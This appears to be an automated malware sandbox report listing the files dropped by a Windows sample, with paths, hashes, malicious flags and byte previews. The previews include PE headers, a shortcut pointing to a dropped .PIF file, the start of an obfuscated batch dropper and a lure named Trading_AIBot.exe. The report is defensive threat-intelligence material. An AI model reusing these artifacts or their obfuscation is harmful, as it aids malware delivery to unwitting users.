                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.421207759462551
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:j8oREwt2ioQ3J+RHsqjnhMgeiCl7G0nehbGZpbD:j8oRpoFbDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:CDDA92F225D42E9ABCCD3D48913C2EAC
                                                                                                                                                                                                                                                                                                                                                    SHA1:CFA6EB6A913D56929A9A3B09E435347419AE0E7F
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F52335E576B1F774C9BC40043CBFC614C40B2776D3B7CDEFFD4D8A0B424B1382
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B97E159F4EA9EF54D5F58E7DCBF4EFD185A3B2653EBE0E2A8CF42C4E8F2AAD3B97AF4B65D57C316ADB9D8B95D0113DD266361F2EADDD2BD4A51674E96B195E9B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................J..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Juqmtmya.url

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):104
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195196088872012
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsiBsOsbxOaK/y:HRYFVmTWDyzmBsOExOPq
                                                                                                                                                                                                                                                                                                                                                    MD5:D78C2108A0BBCF6F88464D42E31E5BDE
                                                                                                                                                                                                                                                                                                                                                    SHA1:40003F2B4A419B91DD469B9B699FF8D2AFEB0189
                                                                                                                                                                                                                                                                                                                                                    SHA-256:460C2E952B570A0A70E1A2C993CD42AFE8A9D6239AEAEF0CD17EB30F37B78462
                                                                                                                                                                                                                                                                                                                                                    SHA-512:2529FD05C59B561ABC61D5F7E2705A08000EB82BA6E817C7B1F9CEAB8F1016513FBC5038C063CF68E2990DA21A479A8EDFC67FAF5290DC597AD3F3BDB367AB5B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF"..IconIndex=912420..HotKey=68..

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\Juqmtmya

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2386716
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.750563994554051
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:y4lGgAK/eHLG7HcOEPQW1LM9Cwyq7uP6yIFBlZ:ppAqyGTE1o9PPyOBlZ
                                                                                                                                                                                                                                                                                                                                                    MD5:5E9E591803218A9803C8F7B2C63DD663
                                                                                                                                                                                                                                                                                                                                                    SHA1:8711875A288EBD187AFFE45CD31EC8E55D05FDB1
                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD53A567B8ED172FE46F5396276B2FA285CB9FCE1748411EB42960833CBC9A93
                                                                                                                                                                                                                                                                                                                                                    SHA-512:407B99B5AA46998EECCEED92484C0BDFE86EF56FA9AB1BAC83F13B3615EF1CCC898B0DEEC6A02F1659637B6723AE474781955E7A5EB8B28450210C734BE4503E
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:...Y#..K..... .$..!.!'&..&.......%..... ........ %.....Y#..KU"..!.&..&&...Y#..K^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyr.Rh-kca.e_p.f.law9wkv`.bvms.k\{{._g<Qp).9j8....l+.5a..Gw..5^..@.3\^T....7ct[.h.....yr...d..Y.7^r..4.v.\*

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\Juqmtmya.PIF

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1226752
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.458699684550258
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
                                                                                                                                                                                                                                                                                                                                                    MD5:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                                    SHA1:F1986A61C2CB0107444FBD3E8075A25E21FB26CA
                                                                                                                                                                                                                                                                                                                                                    SHA-256:0161D30DEFEE14B9BDAC49068C63A344320C11330ACDFC10952C025637684ADB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9D466680CC90F57ADA29495E32592084EC6DAF37CDC53F2776A720D66F0284B09C619A25C9EDE8E73E91B8C20D2A7AB5DFEE0504BA7454389CE842AFD27962A1
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\PNO

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:G:G
                                                                                                                                                                                                                                                                                                                                                    MD5:235E3CE2A2E86591AA93D92D02D1F10A
                                                                                                                                                                                                                                                                                                                                                    SHA1:AE1639960DB3F5A29406D68578F4E7AB7F3CA39E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:EC185E1B830B1DB532BB59FAE58E706DE8371497B7A26A48795E7B870DE6AB69
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D56AC6BAB05777633DAEEAE9CA032DD2A6A2F2EC399E649FB9A588374CCF1FB3CCE6700D05070A21396B7D1A387A4FD8790194E97A75A69D7705735FD828DA55
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:40..

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\aymtmquJ.cmd

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):62357
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                                                    MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                                                    SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\Libraries\aymtmquJ.pif

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):68096
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                                                    MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                    SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\alpha.pif

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):236544
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                                                                                                                                                    MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                                                                                                                                                    SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Users\Public\xpha.pif

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18944
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.742964649637377
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                                                                                                                                                                                                                    MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                    SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Trading_AIBot.exe.log

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):410
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                                                                    MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                                                                    SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                                                                    SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                                                                    SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.379460230152629
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                                                                                                                                                                                                    MD5:4DC84D28CF28EAE82806A5390E5721C8
                                                                                                                                                                                                                                                                                                                                                    SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1425408
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.680690579464684
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                    SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.................................J...........................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                                                                                                                                    MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                    SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                                                                                                                                    SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfghvba3.kvf.psm1

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_msd0bpl5.t3k.ps1

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfvlf4qo.juh.psm1

                                                                                                                                                                                                                                                                                                                                                    Download File
